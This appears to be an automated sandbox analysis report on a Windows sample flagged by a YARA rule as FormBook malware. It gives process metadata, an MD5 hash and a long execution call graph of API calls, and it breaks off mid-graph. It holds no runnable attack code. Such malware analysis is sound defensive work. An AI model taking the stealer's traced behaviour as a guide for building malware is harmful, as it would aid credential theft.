                                                        Path:C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe"
                                                        Imagebase:0x940000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3166059888.0000000005440000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:12
                                                        Start time:09:50:26
                                                        Start date:07/11/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff613480000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:3.4%
                                                          Dynamic/Decrypted Code Coverage:0.9%
                                                          Signature Coverage:7.4%
                                                          Total number of Nodes:1961
                                                          Total number of Limit Nodes:164
                                                          execution_graph 97048 3844c8 97052 39625a 97048->97052 97050 3844d3 97051 39625a 86 API calls 97050->97051 97051->97050 97057 396267 97052->97057 97062 396294 97052->97062 97053 396296 97091 349488 85 API calls Mailbox 97053->97091 97054 39629b 97063 349997 97054->97063 97057->97053 97057->97054 97060 39628e 97057->97060 97057->97062 97090 349700 59 API calls _wcsstr 97060->97090 97062->97050 97064 3499b1 97063->97064 97073 3499ab 97063->97073 97065 3499b7 __itow 97064->97065 97066 3499f9 97064->97066 97067 37f92c __i64tow 97064->97067 97071 37f833 97064->97071 97092 360f36 97065->97092 97106 363818 84 API calls 3 library calls 97066->97106 97067->97067 97074 360f36 Mailbox 59 API calls 97071->97074 97079 37f8ab Mailbox _wcscpy 97071->97079 97072 3499d1 97072->97073 97102 347f41 97072->97102 97081 347c8e 97073->97081 97076 37f878 97074->97076 97077 360f36 Mailbox 59 API calls 97076->97077 97078 37f89e 97077->97078 97078->97079 97080 347f41 59 API calls 97078->97080 97107 363818 84 API calls 3 library calls 97079->97107 97080->97079 97082 37efc4 97081->97082 97083 347ca0 97081->97083 97142 397f03 59 API calls _memmove 97082->97142 97136 347bb1 97083->97136 97086 347cac 97086->97062 97087 37efce 97143 3481a7 97087->97143 97089 37efd6 Mailbox 97090->97062 97091->97054 97094 360f3e 97092->97094 97095 360f58 97094->97095 97097 360f5c std::exception::exception 97094->97097 97108 36588c 97094->97108 97125 363521 DecodePointer 97094->97125 97095->97072 97126 36871b RaiseException 97097->97126 97099 360f86 97127 368651 58 API calls _free 97099->97127 97101 360f98 97101->97072 97103 347f50 __wsetenvp _memmove 97102->97103 97104 360f36 Mailbox 59 API calls 97103->97104 97105 347f8e 97104->97105 97105->97073 97106->97065 97107->97067 97109 365907 97108->97109 97118 365898 97108->97118 97134 363521 DecodePointer 97109->97134 97111 36590d 97135 368ca8 58 API calls __getptd_noexit 97111->97135 97114 3658cb RtlAllocateHeap 97115 3658ff 97114->97115 97114->97118 97115->97094 97117 3658a3 97117->97118 97128 36a2eb 58 API calls 2 library calls 97117->97128 97129 36a348 58 API calls 8 library calls 97117->97129 97130 36321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97117->97130 97118->97114 97118->97117 97119 3658f3 97118->97119 97123 3658f1 97118->97123 97131 363521 DecodePointer 97118->97131 97132 368ca8 58 API calls __getptd_noexit 97119->97132 97133 368ca8 58 API calls __getptd_noexit 97123->97133 97125->97094 97126->97099 97127->97101 97128->97117 97129->97117 97131->97118 97132->97123 97133->97115 97134->97111 97135->97115 97137 347bbf 97136->97137 97141 347be5 _memmove 97136->97141 97138 360f36 Mailbox 59 API calls 97137->97138 97137->97141 97139 347c34 97138->97139 97140 360f36 Mailbox 59 API calls 97139->97140 97140->97141 97141->97086 97142->97087 97144 3481b2 97143->97144 97145 3481ba 97143->97145 97147 3480d7 59 API calls 2 library calls 97144->97147 97145->97089 97147->97145 97148 341055 97153 342649 97148->97153 97163 3477c7 97153->97163 97158 342754 97159 34105a 97158->97159 97171 343416 59 API calls 2 library calls 97158->97171 97160 362ec0 97159->97160 97179 362dc4 97160->97179 97162 341064 97164 360f36 Mailbox 59 API calls 97163->97164 97165 3477e8 97164->97165 97166 360f36 Mailbox 59 API calls 97165->97166 97167 3426b7 97166->97167 97168 343582 97167->97168 97172 3435b0 97168->97172 97171->97158 97173 3435bd 97172->97173 97174 3435a1 97172->97174 97173->97174 97175 3435c4 RegOpenKeyExW 97173->97175 97174->97158 97175->97174 97176 3435de RegQueryValueExW 97175->97176 97177 343614 RegCloseKey 97176->97177 97178 3435ff 97176->97178 97177->97174 97178->97177 97180 362dd0 __getstream 97179->97180 97187 363397 97180->97187 97186 362df7 __getstream 97186->97162 97204 369d8b 97187->97204 97189 362dd9 97190 362e08 DecodePointer DecodePointer 97189->97190 97191 362de5 97190->97191 97192 362e35 97190->97192 97201 362e02 97191->97201 97192->97191 97250 368924 59 API calls __filbuf 97192->97250 97194 362e98 EncodePointer EncodePointer 97194->97191 97195 362e47 97195->97194 97196 362e6c 97195->97196 97251 3689e4 61 API calls 2 library calls 97195->97251 97196->97191 97199 362e86 EncodePointer 97196->97199 97252 3689e4 61 API calls 2 library calls 97196->97252 97199->97194 97200 362e80 97200->97191 97200->97199 97253 3633a0 97201->97253 97205 369daf EnterCriticalSection 97204->97205 97206 369d9c 97204->97206 97205->97189 97211 369e13 97206->97211 97208 369da2 97208->97205 97235 363235 58 API calls 3 library calls 97208->97235 97212 369e1f __getstream 97211->97212 97213 369e40 97212->97213 97214 369e28 97212->97214 97223 369e61 __getstream 97213->97223 97239 36899d 58 API calls 2 library calls 97213->97239 97236 36a2eb 58 API calls 2 library calls 97214->97236 97216 369e2d 97237 36a348 58 API calls 8 library calls 97216->97237 97219 369e55 97221 369e5c 97219->97221 97222 369e6b 97219->97222 97220 369e34 97238 36321f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97220->97238 97240 368ca8 58 API calls __getptd_noexit 97221->97240 97224 369d8b __lock 58 API calls 97222->97224 97223->97208 97227 369e72 97224->97227 97229 369e97 97227->97229 97230 369e7f 97227->97230 97242 362ed5 97229->97242 97241 369fab InitializeCriticalSectionAndSpinCount 97230->97241 97233 369e8b 97248 369eb3 LeaveCriticalSection _doexit 97233->97248 97236->97216 97237->97220 97239->97219 97240->97223 97241->97233 97243 362ede RtlFreeHeap 97242->97243 97247 362f07 __dosmaperr 97242->97247 97244 362ef3 97243->97244 97243->97247 97249 368ca8 58 API calls __getptd_noexit 97244->97249 97246 362ef9 GetLastError 97246->97247 97247->97233 97248->97223 97249->97246 97250->97195 97251->97196 97252->97200 97256 369ef5 LeaveCriticalSection 97253->97256 97255 362e07 97255->97186 97256->97255 97257 341016 97262 344ad2 97257->97262 97260 362ec0 __cinit 67 API calls 97261 341025 97260->97261 97263 360f36 Mailbox 59 API calls 97262->97263 97264 344ada 97263->97264 97265 34101b 97264->97265 97269 344a94 97264->97269 97265->97260 97270 344aaf 97269->97270 97271 344a9d 97269->97271 97273 344afe 97270->97273 97272 362ec0 __cinit 67 API calls 97271->97272 97272->97270 97274 3477c7 59 API calls 97273->97274 97275 344b16 GetVersionExW 97274->97275 97297 347d2c 97275->97297 97277 344b59 97281 344b86 97277->97281 97310 347e8c 97277->97310 97279 344b7a 97314 347886 97279->97314 97282 37dbbd 97281->97282 97283 344bf1 GetCurrentProcess IsWow64Process 97281->97283 97284 344c0a 97283->97284 97285 344c20 97284->97285 97286 344c89 GetSystemInfo 97284->97286 97306 344c95 97285->97306 97287 344c56 97286->97287 97287->97265 97290 344c32 97292 344c95 2 API calls 97290->97292 97291 344c7d GetSystemInfo 97293 344c47 97291->97293 97294 344c3a GetNativeSystemInfo 97292->97294 97293->97287 97295 344c4d FreeLibrary 97293->97295 97294->97293 97295->97287 97298 347da5 97297->97298 97299 347d38 __wsetenvp 97297->97299 97300 347e8c 59 API calls 97298->97300 97301 347d73 97299->97301 97302 347d4e 97299->97302 97305 347d56 _memmove 97300->97305 97319 348189 59 API calls Mailbox 97301->97319 97318 348087 59 API calls Mailbox 97302->97318 97305->97277 97307 344c2e 97306->97307 97308 344c9e LoadLibraryA 97306->97308 97307->97290 97307->97291 97308->97307 97309 344caf GetProcAddress 97308->97309 97309->97307 97311 347e9a 97310->97311 97313 347ea3 _memmove 97310->97313 97311->97313 97320 347faf 97311->97320 97313->97279 97315 347894 97314->97315 97316 347e8c 59 API calls 97315->97316 97317 3478a4 97316->97317 97317->97281 97318->97305 97319->97305 97321 347fc2 97320->97321 97323 347fbf _memmove 97320->97323 97322 360f36 Mailbox 59 API calls 97321->97322 97322->97323 97323->97313 97324 341066 97329 34f8cf 97324->97329 97326 34106c 97327 362ec0 __cinit 67 API calls 97326->97327 97328 341076 97327->97328 97330 34f8f0 97329->97330 97362 360083 97330->97362 97334 34f937 97335 3477c7 59 API calls 97334->97335 97336 34f941 97335->97336 97337 3477c7 59 API calls 97336->97337 97338 34f94b 97337->97338 97339 3477c7 59 API calls 97338->97339 97340 34f955 97339->97340 97341 3477c7 59 API calls 97340->97341 97342 34f993 97341->97342 97343 3477c7 59 API calls 97342->97343 97344 34fa5e 97343->97344 97372 3560e7 97344->97372 97348 34fa90 97349 3477c7 59 API calls 97348->97349 97350 34fa9a 97349->97350 97400 35ff1e 97350->97400 97352 34fae1 97353 34faf1 GetStdHandle 97352->97353 97354 34fb3d 97353->97354 97355 384904 97353->97355 97357 34fb45 OleInitialize 97354->97357 97355->97354 97356 38490d 97355->97356 97407 3a6be1 64 API calls Mailbox 97356->97407 97357->97326 97359 384914 97408 3a72b0 CreateThread 97359->97408 97361 384920 CloseHandle 97361->97357 97409 36015c 97362->97409 97365 36015c 59 API calls 97366 3600c5 97365->97366 97367 3477c7 59 API calls 97366->97367 97368 3600d1 97367->97368 97369 347d2c 59 API calls 97368->97369 97370 34f8f6 97369->97370 97371 3602e2 6 API calls 97370->97371 97371->97334 97373 3477c7 59 API calls 97372->97373 97374 3560f7 97373->97374 97375 3477c7 59 API calls 97374->97375 97376 3560ff 97375->97376 97416 355bfd 97376->97416 97379 355bfd 59 API calls 97380 35610f 97379->97380 97381 3477c7 59 API calls 97380->97381 97382 35611a 97381->97382 97383 360f36 Mailbox 59 API calls 97382->97383 97384 34fa68 97383->97384 97385 356259 97384->97385 97386 356267 97385->97386 97387 3477c7 59 API calls 97386->97387 97388 356272 97387->97388 97389 3477c7 59 API calls 97388->97389 97390 35627d 97389->97390 97391 3477c7 59 API calls 97390->97391 97392 356288 97391->97392 97393 3477c7 59 API calls 97392->97393 97394 356293 97393->97394 97395 355bfd 59 API calls 97394->97395 97396 35629e 97395->97396 97397 360f36 Mailbox 59 API calls 97396->97397 97398 3562a5 RegisterWindowMessageW 97397->97398 97398->97348 97401 35ff2e 97400->97401 97402 395ac5 97400->97402 97404 360f36 Mailbox 59 API calls 97401->97404 97419 3a9b90 60 API calls 97402->97419 97405 35ff36 97404->97405 97405->97352 97406 395ad0 97407->97359 97408->97361 97420 3a7296 65 API calls 97408->97420 97410 3477c7 59 API calls 97409->97410 97411 360167 97410->97411 97412 3477c7 59 API calls 97411->97412 97413 36016f 97412->97413 97414 3477c7 59 API calls 97413->97414 97415 3600bb 97414->97415 97415->97365 97417 3477c7 59 API calls 97416->97417 97418 355c05 97417->97418 97418->97379 97419->97406 97421 367dd3 97422 367ddf __getstream 97421->97422 97458 369f88 GetStartupInfoW 97422->97458 97424 367de4 97460 368cfc GetProcessHeap 97424->97460 97426 367e3c 97427 367e47 97426->97427 97543 367f23 58 API calls 3 library calls 97426->97543 97461 369c66 97427->97461 97430 367e4d 97431 367e58 __RTC_Initialize 97430->97431 97544 367f23 58 API calls 3 library calls 97430->97544 97482 36d752 97431->97482 97434 367e67 97435 367e73 GetCommandLineW 97434->97435 97545 367f23 58 API calls 3 library calls 97434->97545 97501 3750a3 GetEnvironmentStringsW 97435->97501 97438 367e72 97438->97435 97441 367e8d 97442 367e98 97441->97442 97546 363235 58 API calls 3 library calls 97441->97546 97511 374ed8 97442->97511 97445 367e9e 97446 367ea9 97445->97446 97547 363235 58 API calls 3 library calls 97445->97547 97525 36326f 97446->97525 97449 367eb1 97450 367ebc __wwincmdln 97449->97450 97548 363235 58 API calls 3 library calls 97449->97548 97531 34492e 97450->97531 97453 367ed0 97454 367edf 97453->97454 97549 3634d8 58 API calls _doexit 97453->97549 97550 363260 58 API calls _doexit 97454->97550 97457 367ee4 __getstream 97459 369f9e 97458->97459 97459->97424 97460->97426 97551 363307 36 API calls 2 library calls 97461->97551 97463 369c6b 97552 369ebc InitializeCriticalSectionAndSpinCount __getstream 97463->97552 97465 369c70 97466 369c74 97465->97466 97554 369f0a TlsAlloc 97465->97554 97553 369cdc 61 API calls 2 library calls 97466->97553 97469 369c79 97469->97430 97470 369c86 97470->97466 97471 369c91 97470->97471 97555 368955 97471->97555 97474 369cd3 97563 369cdc 61 API calls 2 library calls 97474->97563 97477 369cd8 97477->97430 97478 369cb2 97478->97474 97479 369cb8 97478->97479 97562 369bb3 58 API calls 4 library calls 97479->97562 97481 369cc0 GetCurrentThreadId 97481->97430 97483 36d75e __getstream 97482->97483 97484 369d8b __lock 58 API calls 97483->97484 97485 36d765 97484->97485 97486 368955 __calloc_crt 58 API calls 97485->97486 97487 36d776 97486->97487 97488 36d7e1 GetStartupInfoW 97487->97488 97489 36d781 @_EH4_CallFilterFunc@8 __getstream 97487->97489 97492 36d925 97488->97492 97496 36d7f6 97488->97496 97489->97434 97490 36d9ed 97577 36d9fd LeaveCriticalSection _doexit 97490->97577 97491 36d844 97491->97492 97498 36d878 GetFileType 97491->97498 97575 369fab InitializeCriticalSectionAndSpinCount 97491->97575 97492->97490 97495 36d972 GetStdHandle 97492->97495 97497 36d985 GetFileType 97492->97497 97576 369fab InitializeCriticalSectionAndSpinCount 97492->97576 97494 368955 __calloc_crt 58 API calls 97494->97496 97495->97492 97496->97491 97496->97492 97496->97494 97497->97492 97498->97491 97502 3750b4 97501->97502 97503 367e83 97501->97503 97578 36899d 58 API calls 2 library calls 97502->97578 97507 374c9b GetModuleFileNameW 97503->97507 97505 3750da _memmove 97506 3750f0 FreeEnvironmentStringsW 97505->97506 97506->97503 97508 374ccf _wparse_cmdline 97507->97508 97510 374d0f _wparse_cmdline 97508->97510 97579 36899d 58 API calls 2 library calls 97508->97579 97510->97441 97512 374ef1 __wsetenvp 97511->97512 97516 374ee9 97511->97516 97513 368955 __calloc_crt 58 API calls 97512->97513 97521 374f1a __wsetenvp 97513->97521 97514 374f71 97515 362ed5 _free 58 API calls 97514->97515 97515->97516 97516->97445 97517 368955 __calloc_crt 58 API calls 97517->97521 97518 374f96 97519 362ed5 _free 58 API calls 97518->97519 97519->97516 97521->97514 97521->97516 97521->97517 97521->97518 97522 374fad 97521->97522 97580 374787 58 API calls __filbuf 97521->97580 97581 368f46 IsProcessorFeaturePresent 97522->97581 97524 374fb9 97524->97445 97526 36327b __IsNonwritableInCurrentImage 97525->97526 97604 36a651 97526->97604 97528 363299 __initterm_e 97529 362ec0 __cinit 67 API calls 97528->97529 97530 3632b8 __cinit __IsNonwritableInCurrentImage 97528->97530 97529->97530 97530->97449 97532 344948 97531->97532 97542 3449e7 97531->97542 97533 344982 IsThemeActive 97532->97533 97607 3634ec 97533->97607 97537 3449ae 97619 344a5b SystemParametersInfoW SystemParametersInfoW 97537->97619 97539 3449ba 97620 343b4c 97539->97620 97541 3449c2 SystemParametersInfoW 97541->97542 97542->97453 97543->97427 97544->97431 97545->97438 97549->97454 97550->97457 97551->97463 97552->97465 97553->97469 97554->97470 97558 36895c 97555->97558 97557 368997 97557->97474 97561 369f66 TlsSetValue 97557->97561 97558->97557 97560 36897a 97558->97560 97564 375376 97558->97564 97560->97557 97560->97558 97572 36a2b2 Sleep 97560->97572 97561->97478 97562->97481 97563->97477 97565 375381 97564->97565 97571 37539c 97564->97571 97566 37538d 97565->97566 97565->97571 97573 368ca8 58 API calls __getptd_noexit 97566->97573 97567 3753ac HeapAlloc 97570 375392 97567->97570 97567->97571 97570->97558 97571->97567 97571->97570 97574 363521 DecodePointer 97571->97574 97572->97560 97573->97570 97574->97571 97575->97491 97576->97492 97577->97489 97578->97505 97579->97510 97580->97521 97582 368f51 97581->97582 97587 368dd9 97582->97587 97586 368f6c 97586->97524 97588 368df3 _memset ___raise_securityfailure 97587->97588 97589 368e13 IsDebuggerPresent 97588->97589 97595 36a2d5 SetUnhandledExceptionFilter UnhandledExceptionFilter 97589->97595 97592 368ed7 ___raise_securityfailure 97596 36c776 97592->97596 97593 368efa 97594 36a2c0 GetCurrentProcess TerminateProcess 97593->97594 97594->97586 97595->97592 97597 36c780 IsProcessorFeaturePresent 97596->97597 97598 36c77e 97596->97598 97600 375a8a 97597->97600 97598->97593 97603 375a39 5 API calls ___raise_securityfailure 97600->97603 97602 375b6d 97602->97593 97603->97602 97605 36a654 EncodePointer 97604->97605 97605->97605 97606 36a66e 97605->97606 97606->97528 97608 369d8b __lock 58 API calls 97607->97608 97609 3634f7 DecodePointer EncodePointer 97608->97609 97672 369ef5 LeaveCriticalSection 97609->97672 97611 3449a7 97612 363554 97611->97612 97613 36355e 97612->97613 97614 363578 97612->97614 97613->97614 97673 368ca8 58 API calls __getptd_noexit 97613->97673 97614->97537 97616 363568 97674 368f36 9 API calls __filbuf 97616->97674 97618 363573 97618->97537 97619->97539 97621 343b59 __write_nolock 97620->97621 97622 3477c7 59 API calls 97621->97622 97623 343b63 GetCurrentDirectoryW 97622->97623 97675 343778 97623->97675 97625 343b8c IsDebuggerPresent 97626 37d3dd MessageBoxA 97625->97626 97627 343b9a 97625->97627 97630 37d3f7 97626->97630 97628 343c73 97627->97628 97627->97630 97631 343bb7 97627->97631 97629 343c7a SetCurrentDirectoryW 97628->97629 97634 343c87 Mailbox 97629->97634 97875 347373 59 API calls Mailbox 97630->97875 97756 3473e5 97631->97756 97634->97541 97635 37d407 97640 37d41d SetCurrentDirectoryW 97635->97640 97637 343bd5 GetFullPathNameW 97638 347d2c 59 API calls 97637->97638 97639 343c10 97638->97639 97772 350a8d 97639->97772 97640->97634 97643 343c2e 97644 343c38 97643->97644 97876 3a4a08 AllocateAndInitializeSid CheckTokenMembership FreeSid 97643->97876 97788 343a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 97644->97788 97648 37d43a 97648->97644 97651 37d44b 97648->97651 97650 343c42 97653 343c55 97650->97653 97873 3443db 68 API calls _memset 97650->97873 97877 344864 97651->97877 97796 350b30 97653->97796 97654 37d453 97657 347f41 59 API calls 97654->97657 97659 37d460 97657->97659 97658 343c60 97658->97628 97874 3444cb Shell_NotifyIconW _memset 97658->97874 97660 37d48f 97659->97660 97661 37d46a 97659->97661 97664 347e0b 59 API calls 97660->97664 97884 347e0b 97661->97884 97666 37d48b GetForegroundWindow ShellExecuteW 97664->97666 97670 37d4bf Mailbox 97666->97670 97667 347c8e 59 API calls 97669 37d482 97667->97669 97671 347e0b 59 API calls 97669->97671 97670->97628 97671->97666 97672->97611 97673->97616 97674->97618 97676 3477c7 59 API calls 97675->97676 97677 34378e 97676->97677 97891 343d43 97677->97891 97679 3437ac 97680 344864 61 API calls 97679->97680 97681 3437c0 97680->97681 97682 347f41 59 API calls 97681->97682 97683 3437cd 97682->97683 97905 344f3d 97683->97905 97686 37d2de 97972 3a9604 97686->97972 97687 3437ee Mailbox 97691 3481a7 59 API calls 97687->97691 97690 37d2fd 97693 362ed5 _free 58 API calls 97690->97693 97694 343801 97691->97694 97695 37d30a 97693->97695 97929 3493ea 97694->97929 97697 344faa 84 API calls 97695->97697 97699 37d313 97697->97699 97703 343ee2 59 API calls 97699->97703 97700 347f41 59 API calls 97701 34381a 97700->97701 97932 348620 97701->97932 97705 37d32e 97703->97705 97704 34382c Mailbox 97706 347f41 59 API calls 97704->97706 97707 343ee2 59 API calls 97705->97707 97708 343852 97706->97708 97709 37d34a 97707->97709 97710 348620 69 API calls 97708->97710 97711 344864 61 API calls 97709->97711 97713 343861 Mailbox 97710->97713 97712 37d36f 97711->97712 97714 343ee2 59 API calls 97712->97714 97716 3477c7 59 API calls 97713->97716 97715 37d37b 97714->97715 97717 3481a7 59 API calls 97715->97717 97718 34387f 97716->97718 97719 37d389 97717->97719 97936 343ee2 97718->97936 97721 343ee2 59 API calls 97719->97721 97723 37d398 97721->97723 97729 3481a7 59 API calls 97723->97729 97725 343899 97725->97699 97726 3438a3 97725->97726 97727 36307d _W_store_winword 60 API calls 97726->97727 97728 3438ae 97727->97728 97728->97705 97730 3438b8 97728->97730 97731 37d3ba 97729->97731 97732 36307d _W_store_winword 60 API calls 97730->97732 97733 343ee2 59 API calls 97731->97733 97734 3438c3 97732->97734 97735 37d3c7 97733->97735 97734->97709 97736 3438cd 97734->97736 97735->97735 97737 36307d _W_store_winword 60 API calls 97736->97737 97738 3438d8 97737->97738 97738->97723 97739 343919 97738->97739 97741 343ee2 59 API calls 97738->97741 97739->97723 97740 343926 97739->97740 97952 34942e 97740->97952 97743 3438fc 97741->97743 97745 3481a7 59 API calls 97743->97745 97747 34390a 97745->97747 97749 343ee2 59 API calls 97747->97749 97749->97739 97751 3493ea 59 API calls 97753 343961 97751->97753 97752 349040 60 API calls 97752->97753 97753->97751 97753->97752 97754 343ee2 59 API calls 97753->97754 97755 3439a7 Mailbox 97753->97755 97754->97753 97755->97625 97757 3473f2 __write_nolock 97756->97757 97758 37ed7b _memset 97757->97758 97759 34740b 97757->97759 97762 37ed97 GetOpenFileNameW 97758->97762 98600 3448ae 97759->98600 97763 37ede6 97762->97763 97765 347d2c 59 API calls 97763->97765 97767 37edfb 97765->97767 97767->97767 97769 347429 98628 3469ca 97769->98628 97773 350a9a __write_nolock 97772->97773 98892 346ee0 97773->98892 97775 350a9f 97787 343c26 97775->97787 98903 3512fe 90 API calls 97775->98903 97777 350aac 97777->97787 98904 354047 92 API calls Mailbox 97777->98904 97779 350ab5 97780 350ab9 GetFullPathNameW 97779->97780 97779->97787 97781 347d2c 59 API calls 97780->97781 97782 350ae5 97781->97782 97783 347d2c 59 API calls 97782->97783 97784 350af2 97783->97784 97785 385004 _wcscat 97784->97785 97786 347d2c 59 API calls 97784->97786 97786->97787 97787->97635 97787->97643 97789 343ac2 LoadImageW RegisterClassExW 97788->97789 97790 37d3cc 97788->97790 98907 343041 7 API calls 97789->98907 98908 3448fe LoadImageW EnumResourceNamesW 97790->98908 97793 343b46 97795 3439e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97793->97795 97794 37d3d5 97795->97650 97797 38501c 97796->97797 97809 350b55 97796->97809 98964 3a9ed4 90 API calls 4 library calls 97797->98964 97799 350e5a 97799->97658 97802 351044 97802->97799 97804 351051 97802->97804 97803 350bab PeekMessageW 97872 350b65 Mailbox 97803->97872 98962 3511f3 342 API calls Mailbox 97804->98962 97807 351058 LockWindowUpdate DestroyWindow GetMessageW 97807->97799 97811 35108a 97807->97811 97808 350e44 97808->97799 98961 3511d0 10 API calls Mailbox 97808->98961 97809->97872 98965 349fbd 60 API calls 97809->98965 98966 39669f 342 API calls 97809->98966 97810 3851da Sleep 97810->97872 97812 385fb1 TranslateMessage DispatchMessageW GetMessageW 97811->97812 97812->97812 97814 385fe1 97812->97814 97814->97799 97815 3850a9 TranslateAcceleratorW 97818 350fa3 PeekMessageW 97815->97818 97815->97872 97816 349fbd 60 API calls 97816->97872 97817 351005 TranslateMessage DispatchMessageW 97817->97818 97818->97872 97819 385b78 WaitForSingleObject 97822 385b95 GetExitCodeProcess CloseHandle 97819->97822 97819->97872 97821 350e73 timeGetTime 97821->97872 97855 3510f5 97822->97855 97823 350fbf Sleep 97856 350fd0 Mailbox 97823->97856 97824 3481a7 59 API calls 97824->97872 97825 3477c7 59 API calls 97825->97856 97826 385e51 Sleep 97826->97856 97828 360f36 59 API calls Mailbox 97828->97872 97830 36034a timeGetTime 97830->97856 97831 3510ae timeGetTime 98963 349fbd 60 API calls 97831->98963 97834 385ee8 GetExitCodeProcess 97837 385efe WaitForSingleObject 97834->97837 97838 385f14 CloseHandle 97834->97838 97835 349997 85 API calls 97835->97872 97836 34b93d 110 API calls 97836->97856 97837->97838 97837->97872 97838->97856 97841 3c5f8e 111 API calls 97841->97856 97842 385bcd 97842->97855 97843 3853d1 Sleep 97843->97872 97844 385f70 Sleep 97844->97872 97846 347f41 59 API calls 97846->97856 97855->97658 97856->97825 97856->97830 97856->97834 97856->97836 97856->97841 97856->97842 97856->97843 97856->97844 97856->97846 97856->97855 97856->97872 98973 3a2700 60 API calls 97856->98973 98974 349fbd 60 API calls 97856->98974 98975 348b13 69 API calls Mailbox 97856->98975 98976 34b89c 342 API calls 97856->98976 98977 396830 60 API calls 97856->98977 98978 3a52eb QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97856->98978 98979 3a3c99 66 API calls Mailbox 97856->98979 97857 3a9ed4 90 API calls 97857->97872 97859 348620 69 API calls 97859->97872 97860 349df0 59 API calls Mailbox 97860->97872 97861 34a000 315 API calls 97861->97872 97862 34b89c 315 API calls 97862->97872 97864 3963f2 59 API calls Mailbox 97864->97872 97865 347f41 59 API calls 97865->97872 97866 348b13 69 API calls 97866->97872 97867 38592e VariantClear 97867->97872 97868 3859c4 VariantClear 97868->97872 97869 348e34 59 API calls Mailbox 97869->97872 97870 385772 VariantClear 97870->97872 97871 3971e5 59 API calls 97871->97872 97872->97803 97872->97808 97872->97810 97872->97815 97872->97816 97872->97817 97872->97818 97872->97819 97872->97821 97872->97823 97872->97824 97872->97826 97872->97828 97872->97831 97872->97835 97872->97855 97872->97856 97872->97857 97872->97859 97872->97860 97872->97861 97872->97862 97872->97864 97872->97865 97872->97866 97872->97867 97872->97868 97872->97869 97872->97870 97872->97871 98909 34e800 97872->98909 98940 34f5c0 97872->98940 98958 34e580 342 API calls 97872->98958 98959 34fe40 342 API calls 2 library calls 97872->98959 98960 3431ce IsDialogMessageW GetClassLongW 97872->98960 98967 3c6081 59 API calls 97872->98967 98968 3a9abe 59 API calls Mailbox 97872->98968 98969 39d801 59 API calls 97872->98969 98970 396363 59 API calls 2 library calls 97872->98970 98971 348561 59 API calls 97872->98971 98972 34843f 59 API calls Mailbox 97872->98972 97873->97653 97874->97628 97875->97635 97876->97648 97878 371ac0 __write_nolock 97877->97878 97879 344871 GetModuleFileNameW 97878->97879 97880 347f41 59 API calls 97879->97880 97881 344897 97880->97881 97882 3448ae 60 API calls 97881->97882 97883 3448a1 Mailbox 97882->97883 97883->97654 97885 37f0a3 97884->97885 97886 347e1f 97884->97886 99359 348189 59 API calls Mailbox 97885->99359 99354 347db0 97886->99354 97889 347e2a 97889->97667 97890 37f0ae __wsetenvp _memmove 97892 343d50 __write_nolock 97891->97892 97893 347d2c 59 API calls 97892->97893 97904 343eb6 Mailbox 97892->97904 97895 343d82 97893->97895 97898 343db8 Mailbox 97895->97898 98013 347b52 97895->98013 97896 347b52 59 API calls 97896->97898 97897 343e89 97899 347f41 59 API calls 97897->97899 97897->97904 97898->97896 97898->97897 97900 347f41 59 API calls 97898->97900 97898->97904 98016 343f84 97898->98016 97901 343eaa 97899->97901 97900->97898 97902 343f84 59 API calls 97901->97902 97902->97904 97904->97679 98022 344d13 97905->98022 97910 37dc3f 97913 344faa 84 API calls 97910->97913 97911 344f68 LoadLibraryExW 98032 344cc8 97911->98032 97915 37dc46 97913->97915 97917 344cc8 3 API calls 97915->97917 97918 37dc4e 97917->97918 98058 34506b 97918->98058 97919 344f8f 97919->97918 97920 344f9b 97919->97920 97922 344faa 84 API calls 97920->97922 97924 3437e6 97922->97924 97924->97686 97924->97687 97926 37dc75 98066 345027 97926->98066 97928 37dc82 97930 360f36 Mailbox 59 API calls 97929->97930 97931 34380d 97930->97931 97931->97700 97933 34862b 97932->97933 97935 348652 97933->97935 98320 348b13 69 API calls Mailbox 97933->98320 97935->97704 97937 343f05 97936->97937 97938 343eec 97936->97938 97939 347d2c 59 API calls 97937->97939 97940 3481a7 59 API calls 97938->97940 97941 34388b 97939->97941 97940->97941 97942 36307d 97941->97942 97943 3630fe 97942->97943 97944 363089 97942->97944 98323 363110 60 API calls 3 library calls 97943->98323 97951 3630ae 97944->97951 98321 368ca8 58 API calls __getptd_noexit 97944->98321 97947 36310b 97947->97725 97948 363095 98322 368f36 9 API calls __filbuf 97948->98322 97950 3630a0 97950->97725 97951->97725 97953 349436 97952->97953 97954 360f36 Mailbox 59 API calls 97953->97954 97955 349444 97954->97955 97956 343936 97955->97956 98324 34935c 59 API calls Mailbox 97955->98324 97958 3491b0 97956->97958 98325 3492c0 97958->98325 97960 3491bf 97961 360f36 Mailbox 59 API calls 97960->97961 97962 343944 97960->97962 97961->97962 97963 349040 97962->97963 97964 37f4d5 97963->97964 97970 349057 97963->97970 97964->97970 98335 348d3b 59 API calls Mailbox 97964->98335 97966 3491a0 98334 349e9c 60 API calls Mailbox 97966->98334 97967 349158 97968 360f36 Mailbox 59 API calls 97967->97968 97971 34915f 